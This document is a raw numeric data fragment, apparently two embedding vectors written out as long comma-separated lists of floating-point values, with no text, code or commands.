0.009596937,0.0012539948,-0.006849994,-0.02732533,-0.068490244,-0.00021048977,0.023930635,-0.019230861,0.0027049158,0.027064666,-0.0086169755,0.005126548,-0.005582971,0.0044947965,0.010163424,0.021455638,0.0056562605,0.0033296205,-0.011914294,0.008129495,0.012780928,-0.0044514462,-0.0042179073,0.005182252,-0.0299832,0.0059843706,0.005493295,-0.00038741375,0.0035056856,0.006142649,-0.02589472,0.011704588,-0.0011865149,0.01246215,0.03986798,-0.008773452,0.017817356,0.010954123,-0.013066383,-0.0052622505,-0.007944776,0.00553985,-0.039007347,0.010618591,-0.006746655,-0.0025759153,0.005692095,-0.033449102,0.036123246,-0.030620987,0.017515514,0.019845076,0.0067151906,-0.009465463,-0.0040091746,-0.0038552484,0.021693518,-0.00003691561,0.005574608,-0.00758734,-0.0017719156,-0.014244934,0.009249894,-0.006848287,0.00034006406,0.011632125,0.015574167,-0.032129373,-0.003272377,-0.037546556,0.00070484425,0.012231322,0.0116204675,-0.0021636104,-0.011004582,-0.03346916,-0.012876424,0.00130153,-0.014043163,-0.017003153,0.018532654,0.00009574549,0.00828157,-0.017462445,0.019393954,0.03785001,-0.006986442,0.0028542131,0.0031419664,0.018205758,-0.0033627762,-0.0014329036,0.003991519,0.024411371,-0.0026570016,0.00993964,0.006987465,-0.022265017,0.005531351,0.027945198,0.020911308,-0.0005685438,-0.0031231397,0.010722384,0.002472146,-0.009691611,0.012765576,-0.020337265,0.0037843317,-0.0048457216,-0.008595716,0.008139876,-0.0087433625,-0.020608738,-0.013708129,0.015434982,0.0027064744,0.02451545,0.014731384,0.020915112,0.007922312,0.010446712,-0.021735791,0.008142347,0.0073540024,-0.0006259561,-0.0028889326,-0.015558909,0.017669484,0.0002946904,0.011852588,-0.005726017,-0.0135084335,0.008865333,0.004164806,-0.028765138,0.0047061793,0.0028088242,-0.013476292,-0.004594707,-0.017318226,0.0076208157,0.023045512,-0.01800616,0.01659208,-0.016031016,0.097745106,-0.03376774,-0.0040971516,0.009139308,0.0283627,0.023204254,-0.01072497,-0.020236861,-0.027023396,-0.013024639,-0.021580901,-0.043468643,0.014265766,-0.0086110225,-0.018200122,-0.009660785,-0.00476352,0.005902575,0.0037839129,0.023283001,0.0013613199,-0.0060024676,0.018651808,-0.0037078382,-0.013120623,-0.045857333,0.0060296054,0.015715498,-0.026876183,-0.004078265,-0.008558595,-0.00902677,-0.022311337,-0.023862764,-0.006836526,0.00078792433,-0.00026115152,0.0019822642,-0.005388741,0.0197882,0.019654332,0.005102345,0.00059470563,0.0014893167,-0.01435299,-0.012550048,0.019656552,0.013939116,-0.020660296,-0.0011722435,-0.0030105347,0.01990954,0.012380945,-0.00018902832,-0.0045363787,-0.0019865115,0.009292771,-0.013992981,0.008413258,0.016765108,-0.008482163,-0.010797757,-0.012935483,-0.020285677,0.016427828,0.022769287,-0.023117773,-0.006388153,-0.008459598,-0.0051568174,-0.02951187,0.018515518,0.0027457855,0.018811733,0.017104391,-0.0033569206,0.0021441707,0.0060915323,0.030435175,0.006853901,-0.0064030997,0.019826693,-0.001265444,-0.021199819,-0.0070111845,0.006187646,-0.018065404,-0.005250447,-0.015183696,0.0031849896,0.03301901,0.0026820987,-0.010712354,-0.022758696,-0.0076504266,0.01666846,0.0032085606,0.007881118,0.009685489,-0.009578023,-0.005311708,0.0012647493,-0.011825186,0.010915965,0.0130546605,-0.00090803794,-0.16604221,-0.01403569,-0.008176524,-0.015495117,0.00079085,0.0013094858,0.005989992,0.031470157,-0.0031731494,-0.03693669,0.011165935,0.014709441,-0.00025001945,0.010394182,0.008306191,-0.00693177,-0.009578895,-0.014264761,0.0055413274,0.005041989,0.022607677,0.0023351025,-0.000021605136,-0.0127242375,-0.009239292,-0.008845043,-0.015673049,0.01243034,0.032100238,0.010199677,-0.024816664,-0.017043134,0.01843818,0.017876506,-0.00838481,-0.003087209,0.009616106,-0.009042563,-0.0058447574,0.0026227115,-0.0042230487,0.005094304,0.026199846,-0.0009519131,0.015721513,-0.009477043,-0.00014398164,0.009136714,0.016927324,0.006769463,-0.014825016,0.019683497,-0.002371906,0.011405389,-0.020693088,-0.01954698,-0.014689561,-0.0034785105,0.0053203,0.0019844559,-0.0014235297,-0.0017669991,-0.012022097,-0.015324409,0.0039221304,-0.0026357889,-0.01123291,-0.0067147287,-0.006726429,0.0036499868,-0.0011344027,-0.0016014617,-0.0014307752,0.0021290993,-0.010620143,0.007523966,-0.008227961,-0.0039820094,-0.012878296,-0.0044714143,-0.035848565,0.021253496,-0.014037207,0.010512196,-0.004301946,-0.008464829,-0.021738557,0.01827511,-0.030285968,0.015126477,0.00031955558,0.012763365,-0.017955547,-0.011164214,-0.012983635,0.0012582194,-0.0056640613,0.020650232,0.009240445,-0.003464356,0.0069979317,0.015678873,-0.0006092682,0.0058910125,-0.121343255,-0.009578587,0.038255066,-0.00337472,-0.010100665,-0.000739607,-0.0022901916,-0.01286105,0.02554218,-0.017902017,-0.011317795,0.0055586416,0.0035394076,0.003162168,0.011480721,-0.00016849629,-0.027342333,0.0050235665,-0.0007631058,-0.014947232,0.014633662,-0.012266287,-0.0066300635,0.0007530832,0.009053782,0.029268276,-0.009603533,0.02468957,-0.0048352447,0.009304361,-0.0024655669,0.028774614,-0.011935657,-0.009728148,-0.048773192,-0.013732016,0.022192368,-0.002172679,-0.0011400996,0.028658496,0.006977616,-0.0021373816,0.011259596,0.00218788,0.004615964,0.000050577357,-0.0056863674,0.011822664,0.004208599,0.0028199598,-0.004685728,0.008108228,-0.013966069,0.010242308,-0.009745067,-0.031873886,-0.010418236,-0.018613553,0.014754052,-0.0049613067,-0.032898292,0.028405624,-0.024538215,0.0222101,-0.01356187,0.0112897875,-0.0063087097,-0.009687037,0.014442176,0.016185082,-0.014293582,0.023360366,0.015012227,-0.024919925,0.024172746,0.0067449254,0.0016627209,0.0026674615,0.027293785,-0.006063607,0.006422685,-0.029901993,0.0038781986,-0.007143739,-0.0034204323,-0.013509407,-0.0036345383,0.024771873,-0.021509072,0.013863382,0.028828228,0.011408069,-0.012817723,0.02923262,0.0015430779,-0.008210892,0.045045037,-0.0024149374,-0.009173403,-0.0047332994,-0.022656823,0.0032026276,-0.006469829,0.016747408,-0.027198208,0.024926376,0.013600602,0.00441265,0.0018720159,-0.0108858915,-0.010760471,-0.0054896693,0.000054336622,-0.011061275,-0.025349751,-0.020705504,-0.003690849,-0.004042348,-0.0015463994,0.0012406635,0.0056574377,-0.023798183,0.0073751737,-0.00666802,-0.02873703,-0.014070074,-0.019231426,0.03121096,-0.0035318155,0.0101745175,-0.0018639866,0.0018129571,-0.007876936,-0.02693624,-0.015787072,0.00014150926,-0.009262198,0.0053674695,0.0031813504,-0.002923295,-0.0016234458,-0.009652285,-0.012937497,-0.0011382549,-0.007786532,5.0542685e-8,-0.014798512,0.00598232,0.006356304,0.003362074,0.015113756,-0.0102453325,0.01796479,0.02959821,0.011579604,0.0077939443,-0.01458495,-0.0037115898,-0.004386176,-0.018001344,0.0078999605,0.0053661517,0.018662296,0.014238418,-0.01616814,-0.025363969,-0.003620737,-0.0045432257,0.0058007627,-0.0012765718,-0.002499154,0.018924754,0.0024777309,-0.03449942,0.006622182,-0.0030983642,0.004626067,0.025926543,0.004663358,0.011614608,0.010278195,-0.000031446358,-0.036140513,0.013430135,0.0018034881,0.01422171,-0.018764965,-0.0018020412,-0.021487411,0.015091816,0.03633551,-0.018092543,-0.0063885218,-0.0095382705,0.01833166,0.0016187123,0.005308495,-0.0016846316,0.039340183,-0.008066717,-0.006691731,0.019051863,-0.017195022,-0.016928203,-0.031688917,-0.007473144,0.0042983396,0.027769351,0.0067136763,0.0022029914,-0.011087418,-0.005818203,0.00833448,0.005920969,0.012218036,0.0044348887,-0.004961424,-0.00687293,0.033198826,0.013376021,-0.006379169,-0.0054702857,0.00019064255,-0.02646661,-0.01041712,0.018259382,0.01691488,-0.006502266,-0.0132351145,-0.01886226,-0.005948141,-0.014545038,-0.005794994,-0.0056363875,-0.004097529,0.009040011,0.005974404,0.0068616536,0.0025496902,0.014532799,0.021308709,0.025213696,0.005243607,0.019747488,-0.0046184543,0.010653336,-0.013173653,0.012071637,-0.004576199,0.029368965,0.021091765,-0.021977082,0.007854001,-0.016072653,-0.005077886,0.0022895327,0.021550676,0.020495217,0.003492108,0.005399011,0.0064891754,-0.031659227,-0.025158765,0.007545182,-0.0044057863,-0.008314853,0.0035987257,-0.020919569,0.002545735,-0.0041144066,0.0051198294,-0.0014722666,-0.000058169928,0.0380208,0.0060120877,-0.014077655,-0.02108554,-0.0072128107,0.017282823,0.012595635,0.009901865,0.0050799893,-0.003759736,0.02248922,-0.0038873944,0.001958099,-0.0047380375,0.006446023,-0.019799331,-0.012924795,-0.0067467904,-0.010309248,-0.0014726452,-0.0049772887,-0.00047725852,0.01718681,0.008116896,-0.012897486,-0.006329788,0.008101946,0.008691965,-0.01683087,-0.008379489,-0.0021071325,0.009970048,-0.0083023645,-0.0078065293,0.022455959,0.007845074,-0.00076426176,-0.005078646,0.023082916,-0.009133876,-0.0075420015,0.0089817,0.008106008,0.00801178,0.017176297,-0.040507756,-0.008879703,0.0017751313,0.008557339,-0.009816823,-0.022073692,0.0028783437,-0.0020323836,-0.009731176,0.02623491,-0.026865508,-0.0016851245,0.019344395,-0.004093025,-0.0014516014,-0.0060634096,0.014270281,-0.010332878,0.0031249374,0.010127148,-0.0031993638,0.006176081,0.003861717,-0.016594823,0.0044764257,-0.0065718507,-0.0138993,0.0108952755,-0.0012586802,0.0027136456,0.025937743,-0.001792301,0.007985806,-0.008397022,0.0064035733,-0.0031031915,-0.022718402,0.02309052,-0.030891359,-0.013939029,0.007984601,0.0012935977,-0.015317268,0.012308492,-0.021040954,0.0037552728,-0.0013743615,-0.017782724,-0.018797358,-0.0055804932,-0.0095230285,0.03116745,-0.0071540372,0.0008996066,-0.024855081,-0.0314327,-0.017638572,-0.10037365,0.0065772706,0.015193162,-0.0062242514,0.04226837,0.0051390757,-0.023827195,-0.0066143773,0.01238109,0.009515351,-0.0002996768,0.013503186,0.007527076,0.012914676,0.010880958,0.007964508,-0.004863113,0.0078702215,0.0024914304,-0.022516297,-0.0016160477,0.016051061,0.0057629854,0.006441542,0.03644946,0.006944834,0.010721941,-0.0030533979,-0.0021204539,0.018539216,-0.007277369,0.005348602,0.015347819,0.0034886114,-0.007189076,0.01690427,-0.010732455,-0.005218019,-0.0009875494,-0.015663974,-0.010431392,0.020678813,-0.0048025795,-0.019308336,-0.016710082,0.018084312,-0.031497486,-0.0034729615,-0.02124154,-0.0018279682,-0.0064247614,0.01414546,-0.0034969773,0.0043647666,0.006924119,0.03712598,0.013992009,-0.01193907,-0.005406585,0.0046538594,-0.013123172,-0.0073054917,0.03345913,0.015421856,0.0036386554,0.027151132,-0.009989004,0.0019995247,-0.011851705,0.025995081,0.0058875442,-0.030561198,-0.034806225,-0.011707692,0.004259495,-0.0005370585,-0.011282693,0.005336146,0.00070737797,0.0009055351,0.016782185,-0.00025346436,0.020107929,-0.020296538,0.01670364,0.028674262,0.0100792,-0.007797106,0.009493412,-0.008411982,0.006482987,0.00055908225,0.013901868,0.01365116,0.0030981333,0.016351433,0.0024503465,0.013844366,0.023326317,0.0057948926,-0.0031729252,0.019410394,-0.008243893,0.0181829,-0.015960447,0.017888425,-0.005789529,0.010238255,0.000915378,-0.011392002,-0.017252073,0.019810895,0.021420391,0.023393357,0.0100681055,0.007800963,0.009560621,-0.000692546,-0.02510676,-0.026181731,-0.04166876,-0.016372517,-0.0010043266,0.012832503,0.014865408,-0.010344495,-0.0033436224,-0.0080162985,-0.024611328,0.014476962,-0.011361027,0.015712094,-0.005077732,0.011648497,-0.008410736,0.0102145905,-0.049624093,0.015851801,-0.009755233,0.005251948,-0.0013751463,-0.027877867,0.00053749845,0.014990237,-0.011805347,0.028063046,-0.009458802,-0.007283711,-0.005558248,-0.014927389,0.015593748,0.014686496,0.017075295,-0.01916084,0.0047069346,0.006697116,0.0035526312,0.0050824857,-0.009760865,-0.006654377,0.0005328372,-0.011965986,-0.00037969704,-0.002550503,-0.01673683,0.017430114,-0.012580122,-0.0066024335,0.0033579515,-0.0029120033,-0.011825575,-0.014103534,-0.0013309029,-0.006667573,-0.028138783,-0.010314502,-0.00047648395,0.022188716,0.007471406,-0.027078537,-0.011373578,0.0005554807,-0.005096517,0.009094135,0.004037864,-0.015044073,-0.01872456,-0.00017219826,-0.0075004683,-0.03353297,-0.026437439,0.013674659,-0.0048579667,0.012125478,0.0073762545,-0.005693958,-0.0036969287,0.008971687,0.006577938,0.02082044,-0.039213993,0.0002155182,-0.010676475,0.020254456,0.016440421,0.030518036,0.0066014715,0.0054028924,-0.035983536,0.017503703,-0.00018905166,-0.012730771,0.007958185,0.14122781,0.018102007,-0.004181838,0.016314678,0.005063326,-0.0029099507,0.028472284,-0.007440284,-0.010050101,-0.017014064,0.020266987,-0.0027247423,0.008870659,0.003808461,-0.007906892,0.03497862,0.0055356356,0.005401747,0.015355527,-0.0058949976,0.018695265,-0.027275804,-0.020393565,-0.044633884,-0.0043502585,-0.0385014,0.01963636,0.024382766,-0.004536336,0.024313694,-0.000084463245,-0.0018213554,0.011320451,0.0078601325,-0.009830035,0.009480804,0.032608356,-0.020819815,-0.0078055584,0.0079947235,0.0049180053,-0.0024168398,0.0036167218,-0.008906909,-0.018527262,0.0005588968,0.022031218,-0.011287218,0.0016579368,-0.030504799,0.014103834,0.009966726,-0.0044971188,-0.013755266,-0.00021947354,-0.020818515,-0.008228816,0.0093652755,0.001349222,-0.0052633313,0.010642509,-0.0015946884,-0.0031438142,-0.0020284595,0.011550409,-0.027868997,-0.02589842,-0.01793295,0.00029929238,-0.019865535,0.0406208,-0.0069585205,0.013810826,-0.0015538977,-0.001203247,0.027985612,-0.0045566405,-0.009667129,-0.02018194,-0.008808078,0.007954577,-0.0048279595,0.015014302,-0.0028218545,0.029353434,0.004343528,0.012151796,0.002730588,0.00006553757,0.00871743,0.0006660506,0.014866819,0.0226056,0.0074424604,-0.0059770923,0.0017630983,0.0085222265,-0.004562155,0.0060961572,-0.0010609608,-0.008170006,-0.018871691,-0.019814318,0.003588763,0.005145071,-0.01009066,-0.00892194,0.02277629,-0.0062513603,0.0014886217,-0.017083025,0.024260866,-0.010807694,0.01684909,0.0006074527,0.020218303,-0.007889661,0.012119943,0.0032797633,-0.0108001465,-0.007369854,0.014575505,0.0036942095,0.026915634,0.020463113,0.03097574,-0.01944385,0.0031146798,-0.0031794165,0.016182376,-0.03170833,-0.0080421455,0.00055243296,0.012330147,0.016264737,-0.0010679571,0.004457045,0.0068305107,0.00048014472,0.009516709,0.017569061,0.0028609105,0.0004460099,0.019810688,0.00002467642,0.004736228,0.038905695,-0.014251252,0.011817663,0.00033848936,-0.0021813982,0.001370666,-0.011034107,-0.011121593,-0.015168052,-0.020672608,0.004271563,-0.0029795773,-0.00812707,-0.018528875,0.014082523,-0.00047935097,0.0008891922,-0.047981605,0.021741746,0.012887906,0.0069152387,-0.022548981,-0.011423845,-0.0069456953,-0.008156116,-0.001924869,-0.00847272,0.007720898,0.0033511724,-0.006365331,0.02586508,0.025020644,-0.019647427,0.004783101,0.019323869,0.006231567,-0.022005979,0.006237349,0.0071679717,-0.0072995713,-0.0038410656,0.022476867,0.011461356,0.02026129,0.0150107425,0.026463667,0.013241775,0.014603931,-0.002990139,-0.003139332,-0.03560297,0.037508313,-0.0073377835,-0.035103716,0.014202098,-0.014529095,0.011223896,-0.010449997,0.017887551,-0.013857191,0.0112654595,0.014021468,-0.023357294,-0.00065737806,0.0011885357,0.012459172,-0.010494618,-0.011361328,-0.0064747236,0.02616033,-0.011812401,-0.023708882,-0.006099736,0.019707825,0.012256901,-0.0026968594,-0.018251712,-0.006783358,-0.0048590894,0.004942032,-0.0005396564,-0.0027115238,0.012967831,-0.031026226,-0.03235077,0.011127586,0.003331221,-0.029922476,-0.000336644,-0.011734829,0.00074134866,0.008421375,-0.019042632,0.0045200028,0.011960766,0.0020689678,0.008278983,0.017182738,-0.010880486,-0.007450829,0.017576521,0.022418216,-0.0007087588,-0.011039874,-0.01954063,-0.008438027,-0.008633742,-0.034636483,-0.050379798,-0.025566036,0.021353498,-0.008762487,0.013052611,0.0008860938,-0.002448459,0.00932111,0.0060409955,-0.013914432,-0.013983888,-0.0066700107,0.0048848456,-0.02190497,-0.013032058,-0.01330231,0.0038582159,0.0009099892,-0.0016964822,0.020064078,0.0220726,-0.0037284293,0.009881956,0.00063913607,-0.007964151,0.011650929,0.02123209,-0.044568803,0.009250558,-0.02128371,-0.018806865,-0.00788618,-0.011438543,-0.0014521937,0.017624646,-0.07717818,-0.017392866,-0.0015170547,0.00076980493,0.009764427,0.016618611,0.0067821457,-0.06263244,-0.042446956,0.023206744,0.0044718194,-0.015153899,-0.031284757,0.011664322,-0.010079725,-0.03277716,-0.009829219,0.008107055,0.0009464503,0.0057813427,0.017842606,0.024120651,0.0006393367,-0.005616772,-0.004569863,0.0094576655,0.009956647,0.011209252,0.014588339,0.024632895,-0.006554356,-0.005420754,-0.025911016,-0.0041181645,-0.0143199405,-0.010816445,0.009834384,-0.00035594983,-0.017341526,-0.04232387,-0.008249637,-0.0006419973,0.0017892055,-0.0009888847,0.0026337605,-0.01604452,0.013908239,0.009844504,0.15046233,-0.01239565,-0.03629511,-0.010005518,-0.0013385814,-0.021763962,0.012289333,0.014789447,0.01807188,-0.0070329984,0.009311889,-0.005205695,0.008515136,0.001729897,0.0016860637,-0.0076449797,0.0070297676,0.097577095,0.0009813145,0.01787201,0.019020554,-0.006172056,-0.0003634367,0.015712658,0.0050927275,-0.05430376,-0.009606939,-0.019912723,0.021953253,0.009055833,-0.024009587,0.012530328,0.011387389,0.016697852,-0.0034577646,0.030655276,-0.005686744,-0.015991867,-0.026240928,-0.02489103,0.00028178413,-0.0107847275,-0.0011871416,-0.01588753,-0.025177788,0.0062616286,0.0014856993,-0.0039236634,0.014180004,0.011798568,0.0029872642,0.011532545,0.0069587315,0.012048116,-0.010918691,0.006485699,0.014869582,0.012651191,-0.02355386,-0.001182935,0.005217128,0.015568911,-0.016251251,0.029487073,0.019803487,-0.0047261254,-0.011549914,0.018872274,-0.019601917,0.009564452,0.02733929,0.022247884,-0.017437922,0.0072398647,0.024562117,0.022709763,-0.01091226,-0.020794332,-0.0051981914,-0.007251291,0.006176725,0.0037879422,-0.0047293995,0.0021300374,0.0086786095,0.0063927714,0.044053506,0.005200168,-0.0138479285,-0.01506589,-0.008717183,0.020155363,-0.012247749,0.015649702,-0.012712819,0.02081671,0.015553781,0.015108918,-0.00782566,-0.022624372,-0.0181272,0.016504958,-0.0064258636,0.01050818,-0.01665231,0.0087570455,0.0077943886,-0.00057381915,-0.004771834,-0.00039279307,0.040672727,0.007459811,0.009478425,0.0054829754,0.00092099264,-0.005667656,-0.016250351,0.0010672419,-0.028051535,0.0043382044,-0.0071634674,-0.0057571465,0.0038820887,-0.00006687351,-0.025065158,0.0023419515,0.015626943,0.009831708,-0.033668138,-0.0055349884,-0.019419845,-0.01911265,0.005740512,0.046527598,-0.0040358417,-0.027906114,-0.0041834987,-0.0030115303,-0.014909744,-0.016368415,0.008676103,0.018064821,-0.00085021125,-0.010963904,0.0001945501,-0.004847632,-0.012691497,-0.021510743],[0.0038679999,-0.011341492,0.0075135627,-0.0075258366,-0.0018634972,-0.0011710281,0.007374574,-0.0027695715,0.015216124,-0.005893887,0.00026927007,0.006065906,-0.0018943646,-0.004506905,0.013366215,0.010053754,0.00032447593,0.009312189,0.043868355,-0.010852471,-0.004552159,-0.0070703025,-0.0028926842,0.026340377,-0.007298162,-0.0010465755,-0.005251617,-0.0045808223,-0.0010710234,0.01960133,0.021288713,0.008521399,-0.003192705,-0.010097121,0.008172894,0.0003597462,-0.009448237,-0.010334594,0.0069477432,0.007088851,0.022533638,0.022560107,0.024502106,0.008211944,-0.009053914,-0.021918856,0.02202209,-0.010788375,-0.0070121987,0.0040638936,0.015369497,0.018339498,0.03383554,0.005614011,-0.017109675,-0.012295293,-0.007295585,-0.008328972,0.037931185,-0.0066661634,-0.00011835377,-0.00453306,-0.024987645,-0.0062276246,-0.042076573,-0.016026946,0.009148561,-0.022082705,0.012475813,0.007977891,-0.02423409,-0.008923917,0.027283544,-0.0021963294,0.008582531,0.010124003,0.00630648,0.003862342,-0.021268995,0.021415453,-0.026104344,-0.009712041,0.019364325,0.02972191,0.010508613,-0.007490796,0.0025003057,-0.0002475448,0.0052681775,0.0075343125,-0.027017662,0.002962474,0.0013793603,-0.0077271378,-0.012023749,0.0153721925,-0.0011194171,-0.013209984,-0.013467573,0.010614053,0.0004500729,0.018641245,-0.018709116,0.008179021,0.011080917,0.014382414,0.013066708,0.017163152,0.0040619806,0.008612567,-0.0051023676,-0.00022904154,0.020062158,-0.015174149,0.012110479,0.001215986,-0.018133782,-0.007906408,0.007354879,-0.0057902187,-0.020312244,0.017085832,-0.014252407,-0.010882847,-0.021046888,-0.008785297,-0.0068286797,-0.0023898482,-0.0036106075,-0.021038726,0.0016514759,0.019775545,-8.680947e-7,0.01029744,-0.011078162,-0.009554441,0.0008760826,-0.021287654,0.0018392059,0.0028473674,0.0067077167,-0.00956157,0.00023788927,0.0057479823,-0.020484691,-0.04204251,-0.0019718336,-0.016497733,-0.0020223048,-0.023103455,0.009491309,-0.033947453,-0.018911272,-0.0046020807,-0.025974749,-0.0033038808,0.004184147,0.0004295948,-0.0045824763,0.012435418,0.00040100404,0.00688363,-0.018854054,0.007155222,-0.0006179054,0.0014823386,0.0013140165,-0.0021928959,0.00094444107,0.003452152,0.012247097,-0.00856365,0.0059298268,-0.0004767943,-0.007360992,0.021523543,-0.0016978065,0.0057000606,-0.0042094584,-0.020536179,-0.011845444,-0.018578194,-0.008532938,0.0016008331,0.03649157,0.018257918,0.023778634,-0.0053990176,-0.018329075,-0.0035092358,-0.0011337447,-0.020730954,-0.0035129546,0.011494638,-0.0010002716,-0.018838845,0.007972487,-0.004867995,-0.020340871,-0.005400514,-0.01980805,-0.011084462,0.0028165164,-0.010329795,0.0059365015,0.011293815,-0.0027467497,0.01000043,-0.018694585,0.008885242,0.025425285,0.00013545564,0.011999057,0.002135073,0.014837385,-0.03416025,0.008754848,0.012494759,0.011065846,0.004201562,0.015495023,-0.0018240706,0.006586914,-0.0026203778,-0.02189468,0.012719204,0.017634615,-0.006531482,-0.020197364,-0.0014335804,0.0151138725,0.013405353,-0.02979203,0.0022028666,0.013309116,-0.00715428,0.001997239,-0.003321662,-0.024296263,-0.014026299,0.0012830768,-0.02023146,0.01609773,0.018897124,0.00605381,0.020040208,0.02250788,-0.0008941516,0.009720186,0.042187206,0.0071581313,-0.008158991,-0.004420321,-0.0061982768,0.007834684,-0.009539496,0.01350734,0.012649748,0.00723345,-0.008985449,0.023083972,0.006507449,-0.008863246,0.0014365067,0.0000996403,-0.015352587,-0.010523616,-0.0163129,-0.0018455477,-0.025347246,0.025697205,-0.012331799,0.0030006182,-0.008243933,0.041742254,-0.000109363595,0.018076327,-0.020682218,0.014611428,0.008509103,0.008098525,0.004954837,-0.012972263,-0.015657865,-0.006095218,0.0017047162,0.00038604462,-0.00023068179,0.0029061206,0.013173828,-0.0088727735,0.0093512265,-0.011541766,0.0010041894,0.01678319,-0.022416329,-0.006088466,0.002427998,-0.004635553,-0.0025708284,0.0044908943,0.0020731161,-0.022921512,0.028527884,0.009877129,0.02440539,-0.02335061,-0.007979954,0.014543807,-0.0016512384,0.0053422097,-0.009897332,0.0037849268,-0.009856751,-0.01056651,0.01196075,0.006748089,0.000796442,-0.0069381525,-0.0015830658,0.0021051024,-0.017886098,-0.037308633,0.004982022,-0.0055061704,-0.015584171,0.0039631976,-0.006817933,-0.009044634,0.01906165,0.016599398,0.012930652,0.01872627,0.0062561864,-0.0046698367,-0.007940504,-0.004504168,0.005884079,0.002185818,-0.0022544165,-0.019602766,-0.0148197,-0.0019595348,-0.012974612,0.014143834,-0.009270796,-0.009444537,0.0042741457,0.010464229,-0.014129342,0.007045326,-0.009633827,-0.012675372,-0.013757072,0.03167753,-0.017531645,-0.0016699965,-0.018883782,-0.01722657,0.0149943875,-0.0020466943,0.006536026,-0.012883829,-0.010885075,0.01903061,0.0027670586,0.018722517,0.022618437,-0.002743272,0.02832882,0.04219114,-0.0005310774,0.021985369,0.0023154663,0.001475313,-0.0075910967,0.013749905,0.06384413,-0.018347692,0.013690162,-0.011052517,-0.012927563,-0.017537188,-0.018622663,0.024217024,-0.0033881448,0.0037107088,0.014632198,-0.03578023,0.019663334,-0.0013153587,0.0068045985,-0.0046835463,-0.010816185,-0.013862233,0.024293425,0.0010795535,0.006776208,0.018871035,0.00865457,-0.014867275,0.011878437,-0.011396066,0.034168556,-0.017200606,0.01443991,-0.017464835,-0.006208781,0.00009229442,0.029223202,0.017845714,-0.016747199,-0.008274503,0.0031782936,0.007203348,0.0043311333,-0.013822241,0.040396567,-0.0021170222,0.009247178,0.022808477,-0.0099995695,0.016075678,0.018030485,0.0019150332,0.006156758,-0.008607302,-0.005694791,-0.002097255,0.024304867,-0.01307852,0.029872732,-0.0042892974,0.0022523475,-0.011586923,0.0223543,0.01170993,0.016430477,-0.004613972,0.007959548,0.008240043,0.005882635,0.00327517,0.05215185,0.014058915,-0.0009362271,0.0014817637,-0.022930449,-0.032760233,0.009998823,0.0125927655,-0.022995958,0.0297277,0.016972685,-0.006836308,0.035065297,0.0068448624,-0.011102335,0.019943139,0.020942349,0.0009883874,-0.014131833,0.012734763,-0.0015361031,-0.007230687,-0.00014336155,-0.0019756388,-0.022686575,-0.014238986,0.003235405,0.002235011,0.012035874,-0.013455726,0.009468476,0.01620596,0.010560824,0.011526499,-0.0006170644,0.020982947,-0.009134592,-0.035402965,-0.00092196494,-0.0014536486,0.0055447677,0.007896172,-0.0050117928,0.01888742,-0.0056965216,-0.020947143,-0.03187139,-0.0055016135,0.025594885,-0.005938825,0.007886486,0.02280301,0.044045348,0.027609888,-0.010316044,-0.0090629645,-0.0062907096,-0.011911327,-0.039375644,0.003637776,0.0045153457,-0.004747558,-0.015760439,-0.015868517,0.0048819454,0.016220417,0.015651103,0.012396309,-0.004782408,0.0027802123,-0.021874176,-0.004512416,0.007343881,0.0038658285,0.005584461,0.027430404,0.009926264,0.005018664,0.022092246,0.005659779,0.015119147,0.012524685,-0.027603274,-0.01925577,0.006131549,-0.008451671,-0.00462735,0.01229472,0.015833996,0.010526006,-0.010497463,0.007971588,0.011276801,0.010876835,-0.0058684954,0.02036983,-0.00035465756,-0.015342751,-0.006837748,0.0015866009,0.030532686,-0.0041486495,0.00016150127,0.020089073,-0.011510412,-0.012869762,0.0049814177,-0.014046919,0.022112435,0.0018470897,0.01761741,0.012116344,0.0021265107,-0.0072932155,0.025271092,0.0070774565,0.0087532215,0.004572074,0.02407985,0.008506955,0.018690664,-0.01425817,0.005551898,-0.016911276,0.015969044,0.0087762615,0.0064035146,0.012679448,-0.015919646,-0.004718589,0.008385804,0.0067675374,-0.004820676,0.0006974226,0.014115821,0.01590459,0.021287017,-0.011199705,-0.019929321,0.0042252736,0.0050813346,0.002517684,-0.0069696815,-0.009544843,-0.0047913184,0.013197004,-0.041371707,0.028169494,0.0045878766,-0.0029326668,-0.001385643,0.011715861,0.014630514,0.017175078,0.0040991926,0.0031407776,0.010492059,0.0051676054,0.026053159,0.0069429716,0.005486245,0.01879622,0.0060001654,0.03263673,0.010331425,0.0050672144,0.007093335,-0.010952478,0.0035022164,-0.0024868108,0.012477241,-0.020539856,-0.01167268,0.022212476,-0.0039036511,0.026628803,0.020275358,-0.007890526,0.0027836347,-0.00001050956,0.005623073,-0.012185477,0.0052831597,-0.010268734,-0.023137867,0.016037334,0.009794892,0.016487138,0.0076506706,-0.0030312017,-0.0045686364,0.00843905,0.00025401858,0.0025564677,0.0039945887,0.00032367394,0.0018369914,-0.009992765,0.0064033647,-0.026301803,0.0050379666,0.020614158,-0.020350583,0.0030018804,0.035959356,-0.008299457,-0.0050828992,0.006240947,0.026426379,-0.0014666595,-0.015490466,0.0030467939,0.018306894,-0.011357482,0.03096062,-0.0010691729,-0.031194575,-0.00694385,0.07910534,-0.006928896,0.03355446,-0.012908866,-0.005759796,-0.011965908,0.00023771278,-0.014866708,0.02446086,0.022699185,-0.015794534,-0.007627109,-0.0063678627,0.015111596,-0.0003863345,0.11420089,0.026358714,0.022719376,-0.00048692978,-0.0014317101,0.0026205396,0.03597124,-0.012180141,-0.018355975,-0.020479333,-0.0005058896,0.0026322633,-0.024871117,0.02676847,-0.0047832546,0.012277688,0.006534243,0.0087373005,-0.0036938018,-0.006016178,-0.0135414945,0.011590661,-0.005118774,0.0034371987,-0.003732139,0.00597407,-0.009830896,-0.014696959,-0.01314736,-0.007339544,0.008692383,-0.018063959,0.001057808,0.002241284,0.008036359,-0.009720186,0.024126599,-0.004238978,-0.019682448,0.013152007,0.020309793,0.0036285,0.03087492,0.015872488,-0.020505773,0.007867011,0.006523112,-0.013132233,-0.0042512985,0.009378315,-0.0036804934,-0.015282744,0.033508476,0.0032600667,-0.022498075,-0.0180333,-0.0026195839,-0.0039065927,0.01104921,-0.0071049007,0.009187054,0.00072865706,-0.01612464,-0.027677322,0.029107556,0.03911903,0.010813723,-0.010429678,-0.00893548,0.026236486,0.0021300742,-0.0018781621,0.014138606,-0.004504662,0.003744217,0.013080321,-0.021285933,0.016532209,0.013519103,-0.01853528,0.00040204872,0.03829113,0.01940144,-0.007574317,0.0015662622,-0.0023620387,0.0003276985,0.013052291,0.00015812324,-0.0036545189,-0.013421065,0.005353291,-0.014696852,-0.013743092,-0.017062834,-0.031971753,0.0020743501,0.014908799,0.009863925,0.030990977,-0.0127857365,-0.016265914,0.019585269